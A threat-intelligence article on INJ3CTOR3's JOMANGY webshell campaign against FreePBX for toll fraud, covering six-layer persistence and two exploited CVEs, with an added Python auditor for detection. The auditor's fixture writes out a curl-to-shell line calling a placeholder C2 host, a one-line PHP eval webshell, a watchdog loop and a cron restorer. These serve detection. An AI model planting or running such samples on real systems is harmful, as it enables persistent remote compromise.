INJ3CTOR3 Deploys JOMANGY Webshell in FreePBX Campaign

CRIL documented INJ3CTOR3 deploying the new JOMANGY webshell alongside a six-layer self-healing persistence mechanism against FreePBX VoIP systems for toll fraud.

    A financially motivated threat actor with a documented history of targeting voice-over-IP infrastructure has deployed a previously undocumented webshell family against FreePBX systems worldwide, establishing persistence through a six-layer mechanism specifically designed to survive every conventional remediation step short of a complete system rebuild. Cyble Research & Intelligence Labs published the analysis on May 22, 2026, documenting the first-ever public description of the JOMANGY webshell alongside a campaign by INJ3CTOR3 that exploits two FreePBX vulnerabilities to gain initial access without requiring any user interaction.

    The Six-Layer Self-Healing Persistence Mechanism

    The technical centerpiece of this campaign is INJ3CTOR3’s persistence architecture, which functions as a self-repairing system where each individual layer is capable of rebuilding any other layer that an administrator removes. The six components operate independently and in coordination: a cron-based command-and-control polling job provides the primary callback mechanism; shell profile modifications to .bashrc and .profile ensure execution persists across user logins; protected crontab backups reinstall the cron job if it is deleted; process watchdogs detect and restart any killed malicious processes; multiple copies of JOMANGY and ZenharR webshells are distributed across different directories so that removing one copy leaves others intact; and a PHP-based execution chain monitors and restores deleted components automatically.

    The practical consequence is that an administrator who discovers and removes one or two layers faces a system that reconstitutes itself from the remaining layers within minutes. Effective remediation requires identifying and eliminating all six simultaneously — a process that demands complete forensic mapping of the compromise before taking any action. For small and medium businesses running FreePBX with limited IT resources, the realistic outcome is that partial remediation attempts fail and the actor retains access, which is exactly the outcome the architecture is designed to produce.
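As an added defensive example (not CRIL's, Cyble's or the actor's code; the page publishes no paths, hashes or other indicators), the following Python audits an offline copy of a FreePBX host's filesystem for artifacts matching each of the six layers described above, so the whole compromise can be mapped before any single component is removed. The file locations, regex heuristics and the sample tree are assumptions constructed for illustration.

```python
import hashlib, re, tempfile
from collections import defaultdict
from pathlib import Path

# Heuristic markers per layer (assumed for illustration; the page publishes no IoCs).
CRON_CMD = re.compile(r"(curl|wget)\s+[^|\n]*\|\s*(sh|bash)\b|\bphp\s+-r\b|base64\s+-d\b")
CRON_SCHED = re.compile(r"^\s*[\d*/,-]+(\s+[\d*/,-]+){4}\s", re.M)
WATCHDOG = re.compile(r"while\s+(true|:|\[)[\s\S]*?\b(pgrep|ps)\b[\s\S]*?\bsleep\b")
WEBSHELL = re.compile(r"\b(eval|assert|system|shell_exec|passthru)\s*\(.*\$_(POST|GET|REQUEST|COOKIE)")
RESTORER = re.compile(r"file_put_contents\s*\([^)]*(crontab|\.bashrc|\.profile|cron\.d)")
CRON_DIRS = ("etc/crontab", "etc/cron.d/", "var/spool/cron/")  # layer-1 locations (assumed)


def audit_tree(root):
    """Walk an offline copy of a host filesystem; return {layer: sorted hit paths}."""
    hits, copies = defaultdict(set), defaultdict(set)  # copies: sha256 -> webshell paths
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel, raw = path.relative_to(root).as_posix(), path.read_bytes()
        text = raw.decode("utf-8", "replace")
        if CRON_CMD.search(text):  # layers 1-3 share the C2 command and differ by location
            if rel.startswith(CRON_DIRS):
                hits["1_cron_c2"].add(rel)
            elif path.name in (".bashrc", ".profile"):
                hits["2_shell_profile"].add(rel)
            elif CRON_SCHED.search(text):
                hits["3_crontab_backup"].add(rel)  # cron syntax stored outside cron paths
        for layer, marker in (("4_watchdog", WATCHDOG), ("6_php_restorer", RESTORER)):
            if marker.search(text):
                hits[layer].add(rel)
        if path.suffix == ".php" and WEBSHELL.search(text):
            hits["5_webshell"].add(rel)
            copies[hashlib.sha256(raw).hexdigest()].add(rel)
    # Identical bytes in several directories is the layer-5 redundancy the text describes.
    hits["5_webshell_copies"] = {p for g in copies.values() if len(g) > 1 for p in g}
    return {layer: sorted(paths) for layer, paths in hits.items()}


def build_sample_tree():
    """Constructed fixture (not real artifacts) laid out like a compromised host."""
    root, c2 = tempfile.mkdtemp(), "curl -s http://C2-PLACEHOLDER/p | sh"
    files = {
        "etc/cron.d/sys": f"*/5 * * * * root {c2}\n",
        "root/.bashrc": f"alias ll='ls -l'\nnohup {c2} &\n",
        "var/tmp/.cron.bak": f"*/5 * * * * root {c2}\n",
        "var/tmp/.wd.sh": "while true; do pgrep -f poll.sh || sh /var/tmp/poll.sh; sleep 30; done\n",
        "var/www/html/a.php": '<?php eval($_POST["c"]); // fixture\n',
        "var/www/html/admin/b.php": '<?php eval($_POST["c"]); // fixture\n',
        "var/www/html/keep.php": "<?php if (!file_exists('/etc/cron.d/sys')) file_put_contents('/etc/cron.d/sys', $c);\n",
    }
    for rel, body in files.items():
        Path(root, rel).parent.mkdir(parents=True, exist_ok=True)
        Path(root, rel).write_text(body)
    return root
```

Run `audit_tree(build_sample_tree())` to see every layer reported at once; on a real host the immutable attribute on the protected backups (layer 3) must be checked separately with `lsattr`, which a filesystem copy does not preserve.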

    CVE-2025-64328 and CVE-2025-57819 Initial Access

    INJ3CTOR3 gains entry via two FreePBX vulnerabilities requiring no user interaction. CVE-2025-64328 is a command injection flaw in the FreePBX filestore module; CVE-2025-57819 is a pre-authentication SQL injection vulnerability in the Endpoint module. Both vulnerabilities have patches available, but hundreds of FreePBX systems remain compromised months after those patches were released — a pattern consistent with the limited patch management capacity of the small business and professional services environments where FreePBX is commonly deployed.

    JOMANGY: A Webshell Without Detection Coverage

    JOMANGY is documented in the CRIL analysis for the first time in any public threat intelligence source. Its absence from prior research means that signature-based detection tools — antivirus, intrusion detection systems, and threat intelligence platforms that rely on known-bad file hashes or behavioral signatures — have no existing coverage for it. An organization running FreePBX that queried its security tooling for JOMANGY indicators before this analysis existed would have found nothing, regardless of whether the webshell was already present on the system.

    ZenharR and INJ3CTOR3’s Operational History Since 2019

    The companion webshell deployed alongside JOMANGY is ZenharR, which was previously documented by Palo Alto Unit 42 in connection with 2022 attacks against FreePBX systems. The reappearance of ZenharR in a 2026 campaign using the same type of target — FreePBX deployments — establishes INJ3CTOR3 as an actor with multi-year operational continuity against the same platform. The actor has been targeting VoIP infrastructure since 2019, and the current campaign represents an evolution of their toolset with the addition of the previously unknown JOMANGY webshell rather than a change in targeting or objective.

    The VoIP Toll Fraud Model and Why Victims Discover It Late

    INJ3CTOR3’s objective once persistent access is established is toll fraud: the actor routes unauthorized international calls through the compromised FreePBX system’s SIP trunk connections, using the victim’s existing relationship with their telecom provider as the billing vehicle. The victim’s telecom provider charges them for calls they never authorized and never made, at rates that can reach thousands of dollars per hour for certain international destinations.

    The discovery timeline for toll fraud is structurally delayed compared to other forms of financially motivated intrusion. Ransomware makes its presence known by design; toll fraud is silent. Victims typically discover it when a monthly telecom bill arrives carrying charges they do not recognize. By that point, the fraudulent calls have already been completed, the charges have been incurred, and the funds have moved. Disputing telecom charges after the fact through a SIP provider involves a different and more difficult recovery process than disputing a credit card transaction.

    For small and medium businesses, law offices, and healthcare practices — the typical FreePBX deployment profile — the combination of delayed discovery, a complete system rebuild requirement for remediation, and retroactive telecom liability creates a compounding harm that outlasts the initial intrusion by weeks or months.
